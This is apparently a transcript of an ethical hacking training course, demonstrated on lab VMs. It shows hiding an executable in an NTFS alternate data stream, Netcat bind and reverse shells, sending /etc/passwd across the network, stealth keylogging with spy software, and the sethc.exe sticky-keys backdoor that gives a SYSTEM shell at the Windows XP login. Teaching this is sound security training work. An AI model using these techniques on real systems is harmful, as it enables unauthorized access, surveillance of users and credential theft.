One technique that hackers often use to get malware onto a system is the use of steganography. Now, steganography is a method of hiding files inside other files, so they're hidden visually and people don't typically see them. In fact, they're often hidden from other programs as well. Now, a hacker can hide malware, trojans, and even remote control software in innocent-looking files just waiting to be executed by a user. Users can also hide images and documents in files to protect them from curious eyes, but there are ways to find these hidden files. Visually, you might not see them, but there are programs that can detect them. And this is typically because of the changes they make to the host file. Now, one use of steganography is through NTFS streams, and sometimes we call NTFS streams alternate data streams. NTFS is the file system of choice that's been used in Windows since way back in Windows NT. And as it was implemented, NTFS streams was meant to provide alternate data streams so that permissions and access control entries could be bundled with the file as metadata. But hackers can use this to stuff other files into actually. And there are programs that you can get to do this, but you can actually do this simply from the command prompt. And I'm going to show you how to do that now in Windows XP. Okay, we're in our Windows XP box. And you can do this on Windows 7, 8, Server 2008, and Server 2012, but it works a little bit differently. Now, in this directory here, I've created a directory called VTC, and I have copied the calc.exe file to this directory. And we can run it here, calc.exe. You can see that that's it. And what we want to do now first is create a simple text file, and we're going to use this text file as the host file. We're going to stuff calc into it. So all I have to do is notepad, and we're going to put the full path in here. We'll call it stuff.txt, and it's going to ask us if we want to create it. We're going to say yes. This is a test of steganography. Okay, and now let's click save, and then we'll close it out. Okay, now let's do a directory on VTC, and we have calc in there obviously, and stuff.txt, which takes up 31 bytes. So now the next step is to get calc inside this file, and that's actually very simple in Windows. All we have to do is type c:\vtc\calc.exe, and then we use the redirector to send it to c:\stuff.txt, and here's where it gets funny. We put a colon there, and that designates the alternate data stream, and we type in calc.exe. So that's how we get it in there. It's actually not that difficult at all. So let's hit enter. Doesn't give us any indication that it did it, but let's delete calc.exe from the directory now. Let's do a directory again. Now notice that now we only have stuff.txt in there. And notice the file size, it's still 31 bytes. Okay, so we don't know for sure if anything changed with it. The only way to really know is to try to run it. Now if we said type stuff.txt, that's all we'd get. Okay, and we can notepad it and we would only get stuff.txt, the contents of it. So we really don't have any indication that it's there. So what we could do is run the start command. And with start, you have to give the full path to the executable. And start is used in Windows XP, Windows 2000, and even newer versions of Windows to start certain commands and so forth. So we're starting this command, and we're going to say stuff.txt. We're going to specify the colon there, calc.exe. And let's see what we get. We got the calculator simply by starting that program stuffed into the stuff.txt file, the alternate data streams. So we can close this. And there are other ways to do this as well with different programs. Snow is a popular steganography program, and it can be used to put pictures, videos, and so forth into a file. And a lot of hackers, as I said, hide their tools this way. One popular tool that's hidden this way is Netcat, and we're going to look at Netcat a little bit later because it can be used to write data to and from hosts on a network, and it can also be used to get command shells, and hackers use this to perform system attacks. And steganography would be one good way to get netcat or something like it to a system. So we haven't seen any indication in stuff.txt that we have another executable there. So that's steganography at its basic level. And of course, there are more advanced tools that will do this a little bit better, but you can actually do this at the command prompt in Windows. It's a little bit different in Windows 7 and 8 and so forth. Like I said, in those cases, you might use the make link command and actually create a shortcut that would execute it. You wouldn't even have to use the start command to do it. And you would simply get the user to execute. Maybe you would rename it as something innocuous like winword.exe, which is the executable for MS Word, or something like that to get the user to execute the file and run it. So that's a little bit about steganography. Now, while a hammer probably isn't one of them, hackers have all kinds of tools at their disposal to attack a system with. And some of these same tools are the ones that they use to attack networks, different operating systems, applications, but a lot of these tools are very specific use. There are probably as many attack tools out there in the world as there are hackers, and probably as many as there are hosts or users. And each hacker probably has their favorite tools. Remember, early in the course, we talked about tools and how it really doesn't matter which tool you use as long as you use the one that works for you, that does what you need it to do, whether that's a Linux tool, Windows tool, or whatever. But each have their favorite tools, as I mentioned. Some of these tools are designed specifically for Windows machines, Linux machines, Macs, or whatever. And other tools work well against all the different operating systems. Maybe they are run from a central attack machine and will work against different operating systems, or maybe they have their own binaries that have to be installed on the victim machine. Whatever the case is, hackers will use the tool that fits the need that they have. Now, attack tools are basically designed to take advantage of operating system vulnerabilities, such as buffer overflows or configuration issues that an operating system may have, or any other kind of vulnerabilities. And this could include the human kind of vulnerabilities, the kind of vulnerability that causes a human to just have the urge to click on that pop-up no matter what. Now, some of these tools are designed to transfer files. Some may install malware. Some install keystroke loggers or surveillance tools or other types of malicious attack tools. Still, others may be designed to get remote command shells. And the reason an attacker may want to get a remote command shell is so they can execute commands remotely on the box, and typically it will be as the user that's logged in. And that's actually one important reason why security people tell users don't use an administrative level account to do your daily work. Only use that administrative level account when you need to, because obviously if you're logged in as an administrator and someone gets a remote shell on your box, then they probably have the level of privileges that you have. So that's one reason we tell them not to do that. But getting this remote shell is something that a lot of tools do. Now, over the next couple of sessions, we're going to look at a couple of tools that are really popular, really cool tools. Netcat is one of them. And it's not necessarily a hacker tool, although it's become that really in reputation. It's actually just a raw packet transfer tool that works between hosts, any host that uses TCP/IP, in fact. And there are other tools out there that can do something similar to Netcat. There are some tools that even give the attacker the ability to remotely control a host over the network. Now, actually, remote controlling a host isn't necessarily a hacker-only endeavor. A lot of system administrators need to be able to do that to adequately control the hosts on their network. And a lot of these tools are, in turn, turned against the network when a hacker gets a hold of them. Things like Hyena, for example, which is a remote management tool, can be turned against a particular network if an attacker uses it against the network or a host. So we're going to look at a couple of tools over the next couple of sessions. We'll look at Netcat. We'll also look at a couple of other tools, a remote control tool, and so forth. So you can get an idea of just generally how a system can be attacked and taken over and what you can do across the network to assume control over a system. So that's what we're going to look at over the next couple of sessions. I have two VMs up, and they're not full screen because I want to be able to show you the output on both screens. I have an XP box up that's sitting on 163.129 and a backtrack box, a backtrack 5R3 box. And what we're going to do is demonstrate Netcat. Now, Netcat is a multi-purpose tool, and it's basically a raw network packet transfer, anything you can think of kind of tool. It sends network data back and forth between two hosts. It basically opens up a network connection and sends it. And there's all kinds of things you can do with Netcat legitimately, but hackers use it to transfer files, to get command shells, to communicate with users, to send malware across to another host, and so forth. So if you're going to be a CEH and a hacker, and really a network security professional in general, you need to understand how Netcat works. Now, most antiviruses will pick up Netcat as a Trojan, so be careful of it. Only run it on machines that you know you need to. Okay, so that's my word of caution. So we can type in nc-h to get the Netcat help, and it's a very simple command to run, very simple switches. The important things that you need are a port to listen on, and you can have the listener, which is usually the victim, listen on a port, and it'll listen for any connections to that port and put them through Netcat to the host. So let's go ahead and do that. Let's nc-l, and we're going to do a V for verbose and a P to establish the port number. And we're just going to use an arbitrary port, 3333. You should use something that something else is not using, just to test with. Okay, it's listening. Now on the backtrack box over here, we just simply type in nc 192.168.163.129, and we have to specify the same port. And so now it's listening. So from here I could start a chat session, and if you'll see over here, you'll see where it established a connection. And I'm just going to say hello, and it appears on the other side. It's like a little conversation, so you can actually use it to communicate. Okay, let's do a Control-C. Now let's send a file across. So let's start Netcat Listener again. In this case, I'm going to actually, any input that Netcat gets, I'm going to send it to a file. So I'm going to direct this to C:// and we'll put it in the same directory, tools, and nc111nt/test.txt. So we've got our listener set up. And over here, let's send the etc password file, for example. So we would say nc 192.168.163.129.3333, and we're going to send through the input redirector /etc/password. And so it has sent that file across the network. So let's do a Control-C here. Let's go back over here and do a directory. And we see that there is a file here that's test.txt. So let's notepad that. And we got the actual etc password file here. So we transferred the file over. Now keep in mind that could have been a piece of malware. So that's how easy that is. The next thing I want to do is show you how to get a command shell. And we're going to get a command shell, bind a shell as it were, or bind a program, and it doesn't have to be a shell. And we're going to do this on this end. On the listener or victim, you simply type in -e and the command that you want to run, cmd.exe, of course, for Windows. And I'm going to say enter. And then on this side, on the backtrack side, I'm going to simply run it the way I normally do to connect. So I hit that, and we give it a second to connect here. And all of a sudden, guess what I've got? A Windows XP command shell on my backtrack box. And I can do a directory, I can change directories, I can do anything. I can run any Windows program. So now I could actually create a user account on the Windows box if I wanted to, using the command line. So I can actually do quite a bit there. And let me move this up so you can see it a little bit. So I've got my directory here now. All I have to do basically is Control-C to break that connection. Now I can also get a reverse command shell. And basically that just simply involves running the listener like normal on the Windows XP side, and then on this side doing the same thing, only the -e/bin shell, and hitting enter. And on the Windows XP side now, I've actually got a shell, but it doesn't tell me that straight up. You actually can just start typing. So I could do an ls and get the directory of the backtrack box. And I can do a cd ..ls. I can run any commands I want. cd/pentest ls, and now I'm in the backtrack box. So I have a reverse command shell now. So you can see that Netcat is very useful and hackers can use it for a lot of things. And Netcat is one of the most popularly used programs to get system access and wage a system attack on a box. And you can use it on Windows or Linux. So a little bit more about attacking a system using a piece of software, malware, or in this case, Netcat. I'm in our Windows XP box, and what I've got is a piece of surveillance software that hackers could use to monitor what goes on a victim's computer, on their desktop. And this is actually one of probably hundreds of pieces of software just like it that are out there, and they're sold by reputable companies, supposedly for the purposes of monitoring your own home computers or for employers to monitor computers in the organization. And they all caveat the sales of these software by saying that you should only use this on computers that you own. Well, obviously hackers aren't going to do that. Hackers are going to use them for whatever they want. So we're looking at the spy software, and basically, I'll show you what it does. Let's go to General here, and it loads up. If you can get this installed on the machine that you want to monitor, it loads up for all users or specific users. You can run it in stealth mode. You can run it when Windows starts up. And this kind of shows what it will log. And I've selected a few things already. Keystrokes used, or keystrokes typed, Windows used, applications executed, websites visited. And it will capture their content as well. It will also log internet traffic, emails, chat conversations, everything. You can even have it monitor specific programs. It will also capture screenshots of a particular user and their activities on the box. And we'll store all these in a file and let you grab this log file with a USB stick, so you could do it very quickly and surreptitiously, and so forth. You can also get alert notifications by email if a user uses a particular application or visits a particular website or does a particular activity. So it's kind of interesting the things you can do with this piece of software. And logging obviously captures which options you can capture. We saw that in the general setup. There's daily log activity that you can deliver remotely, advanced options, like there's a stealth hotkey that you as the administrator, or the hacker rather, can use to bring it up from stealth mode, log locations, remote desktop security, and so forth. So there's some interesting options in this software. So let's go ahead and start to use this, and then we'll go ahead and bring it up and I'll show you what it has logged. So let's say start monitoring. We have to give it the password for it to start. Now obviously, if you're doing this in stealth mode, we don't have to do this. And this is the trial version, so the real version actually doesn't show too much, so the user may not be aware that they're being monitored. So let's open up a text document here, and let's enter a password. My webmail password is 54321 ABCDEF, just for example here. Let's save that and close it. Now let's go visit a website and see what we get. By default, it comes up to the VTC website. Our connection is a little bit slow. While that's opening, let's go run an application. Let's run calc. Do some other activity on the box here. Let's close that. And try going to Google instead. And even if the connection is not active, like it apparently isn't now, the software may log this. Let's go ahead and close this. We don't have to worry about actually going to the site. Let's do our Control-Shift-Alt-M. We get our password back up. Put that in. And then gives us this little nagware there. Now let's go look and see what it logged. Keystrokes typed. So we actually got, here's where we went in the notepad. And it shows things we clicked on, like Explorer, Command, and I typed in calc and ipconfig. I went to Google, tried to go to Google. Didn't get to go there, of course. Program Manager. These are programs that got open. Here is actually where I put in the password to get back to Spy Agent here, which is password 123456. but it logged everything I did basically. Now, we didn't have it do screenshots or anything like that, and obviously that would take up a lot of CPU time and memory, so you'd probably want to do that with caution. Only on certain things would you want to capture screenshots. If you suspected a victim was doing something that you really wanted to capture on the screen, you might do it for that. So that's basically Spy Agent, and again, this is one of probably hundreds of types of software just like it that you could use to get information about an individual from a system that you've attacked and got this software on there. So this is just one way that you could attack a system, get credentials, you could get passwords, you could get information about the user, personal information you could use for identity theft and so forth. And there are dozens of programs out there just like this that do this. So you're not tied to one program. Just do some Google searching and you'll find them. No discussion of system attacks would be complete without talking a little bit about physical security. Physical security is important for several reasons. Physical access is basically a rare but a fantastic opportunity for a hacker to actually get hands-on interaction with their target system. Now, typically, no matter what kinds of technical controls you have, physical access can get through all of them. With physical system access, a hacker can try different things that they may not get to over the network. This might include the use of devices, covert devices like USB keys with malware on them and so forth. They also might be able to try brute force attacks when they're sitting there on the keyboard. They also may try sabotage if their goal is denial of service. If nothing else, they may can at least footprint the organization and get some more information about the target. Now, physical access is often overlooked by both techies and ordinary users. And hackers take advantage of this. They take advantage of poor physical controls, or they even use social engineering to get this hands-on access to the system that they want. The basic tenet in hacking is if you can get physical access to it, it's not theirs anymore, it's yours. Because if you can get physical access to the box, a hacker can do anything to it. You can steal it, you can break it, you can try to hack into it. Now, any technical controls that are out there that you might encounter when you're trying to hack over the network, these include firewalls, encryption, in some cases permissions, and so forth. None of this will prevent or mitigate a physical attack because you're inside already. Now, physical controls include things like guards, gates, guns, closed-circuit television sets, access badges, but it also includes the operational procedures, like what the procedures are for visitor control, for example, whether they have to sign in or whether they have to be escorted throughout a facility. The big physical control, obviously, is organizational personnel. People have to be smart and educated on physical security. Now, having said that, all of these controls can be circumvented by someone who is very adept at social engineering or even an insider. A trusted insider obviously will have a badge to get in. Now, if they decide to go rogue and destroy data or hack into systems, physical controls won't help much. Another thing the hacker may take advantage of are poorly implemented controls if they're not done very well, or controls that are completely missing. Obviously, if there are no gates, guards, guns, or CCTVs and you don't need an access badge, well, obviously this is much easier to get into the place. Now, understand that a hacker only needs a few minutes with the system if they are well equipped, they have the tools they need on them, if they're well organized, and they have a plan. If they know they need to get in and get to a Windows box and stick a USB key in, and there's software on that USB key that will automatically steal the passwords, then they only need a few seconds. And all they need is a few seconds or minutes in the facility. Now, what are the consequences of physical attacks? Well, at the very least, a hacker could steal a system or a device. And when we say system, we're thinking of a big desktop or a server, but not always. What if the hacker could steal a tablet, for example, or a smartphone, or a laptop? We also may think of system damage or alteration. If the goal of the hacker is to deny service to an organization, what better way to do that than to actually physically destroy equipment? Carry a hammer in your pocket and start beating up on keyboards or systems or whatever. The hacker could also alter a device in some way. And of course, data theft or alteration. If the hacker knows that there are USB sticks or USB drives that are in a facility, they may decide to grab one and pocket it so they have data that's on it. This could be personal data or proprietary data. The consequence also could be credential theft. If you're inside of a facility, you may be able to get credentials. Obviously, people leave passwords written down on stickies under their keyboards or things of that nature. You could also try to get the credentials from the system you're actually attacking as well. If nothing else, a hacker can get information just by observing the facility from the inside, looking around, seeing how everything is set up. Maybe they're casing the joint, to use a term from the old days. Maybe they want to know how many gates, guards, guns, CCTVs, and what the security is, so they're footprinting the organization. A hacker could also introduce malware into the system with a USB key that has some on there. They could stick it in the back of a system, let it do its work for a few seconds, infect the system, pull the stick, and walk out the door. And presto, there's malware on the system waiting for the victim to activate it. A hacker could also connect any covert or malicious device. Again, we go back to USB keys, very small ones with a pico size that could be plugged into the back of the computer and may not be noticed, or keystroke loggers. A hacker could also stick a sniffer on the network if they had time. Now, these methods of physical system access and attacks include several things, but immediately coming to mind we have social engineering, obviously, because people are your weakest link, and we'll discuss social engineering later on in the course. Lax employees who don't follow procedures, who don't sign in visitors or don't worry about escorting them, for example. A lack of physical security controls in general. What if there are no controlled circuit televisions? Covert system access, meaning they are inside the facility posing as a maintenance person or a janitor, and they're left unguarded for a minute and they get to the system so they can type on the keyboard. Maybe no one's watching. Infected or malicious media. I mentioned again the USB sticks that may have hacker tools on there, and there are several that you can download and put on a stick that will take only a few seconds to steal a SAM file from a Windows box. Hardware keyloggers, again, another example of a covert malicious device. You can plug them into the back of a computer and in between the keyboard and the computer, and they look like they're part of the keyboard connection. A hacker could also install a sniffer, as I mentioned, so that it could capture all the internal network traffic, and the hacker could get that later. Either it could be sent to them, or they could get back into the facility and get the data later. And don't forget about physical damage. I mean, wire cutters or other tools. If they're in the hacker's pockets, they could clip wires in the network data center or to a main switch and take out some of the devices that people use. These are just some examples of physical system access and the attacks that a hacker could conduct against an organization. We mentioned physical security a few moments ago in a previous session, and I want to show you a demonstration of why physical security is so important. It doesn't really matter how great of a firewall you have or how good your encryption is if you don't have good physical security. Let's say that you had someone come into your area and you left your machine open. What could they do to you? Well, I'm going to show you a demonstration of what you could do to someone that has an XP box, for example. The attack I'm going to show you won't work on a Windows 7 or 8 box because the issues have been fixed. However, there are a lot of Windows XP boxes out there, and Windows 7 and 8 do have their own individual vulnerabilities that are unique to them. So what I want to show you is a cute little trick you can pull if you get the chance. A few minutes is all it takes. And if you happen to be in a situation where you have access to a Windows XP box that's unlocked, you could try something like this. You could be in System 32 in the command prompt and copy cmd.exe to sethc.exe. Let me explain to you what this is. Sethc.exe is a command, a program that runs the accessibility features on a Windows box. It runs under the system account. Now remember, you have the administrator account, which can do everything. It's the root account essentially. But you also have a system account that's a little bit higher that can do even more than administrator. That's the machine's own account, and it's far more powerful, but it doesn't log in interactively and you can't use it for anything. Services and so forth could use it in older versions of Windows to carry out their tasks. So let's see what would happen if we could run something else as sethc.exe under system. And we're going to copy cmd.exe to that file so that the computer thinks that sethc.exe is still on there. So we're going to override it and say yes. Now we're going to log out, and normally by accessing the sticky keys and so forth, you hit Shift 5 times. So when you hit Shift 5 times, you get the little warning and you get the Shift keys and the other accessibility keys turned on. So let's hit Shift 5 times and see what happens. 1, 2, 3, 4, 5. I got the sticky keys warning, but that's really from my Windows 7 host machine, so we don't want to turn that on. But what did I get in the Windows XP box? I got a command prompt, and I haven't even logged into the box. I'm still at the login prompts, the little cute pictures here. So I can obviously run system commands here in this box. I can do anything at the box right now. But let's do something cute. Let's type in Explorer. We actually are going to get a Windows Start button and Start menu so we can actually access the computer. It's going to run programs and even offer me to take a tour of Windows XP as if I had logged in as someone. Let's cancel our FTP server running here. And so right now we've got a Start button. So what can that get us? Well, it can get us into the computer. Now notice the top there. Who am I logged in as? System, the machine account itself. So now I could go into my computer. I could access files and so forth. I could even go into Control Panel and go to Administrative Tools and other things and run different configuration options. I could set up another account if I wanted to. So that gives you an idea of what you can do if you have physical access. And I haven't even logged in yet. So pretty cute little trick. And if you do that, if you have a minute or two to do that, and you can change that, then later on when you have more time, you can go in, hit the Shift key 5 times, get your command prompt, even if someone's not logged in, copy your files, or create another user account for yourself to use later or to come across the network, and you could actually go ahead and get access to the box that way. And all it requires is a couple of minutes of physical access to this Windows XP box to do just that. So we've compromised the Windows XP box. We got physical access. We copied cmd.exe to the sethc.exe, which we know runs under System. And now we have control over the box. And later we can attack it through the network. So cute little trick. And it illustrates why physical access and physical control is so important in security.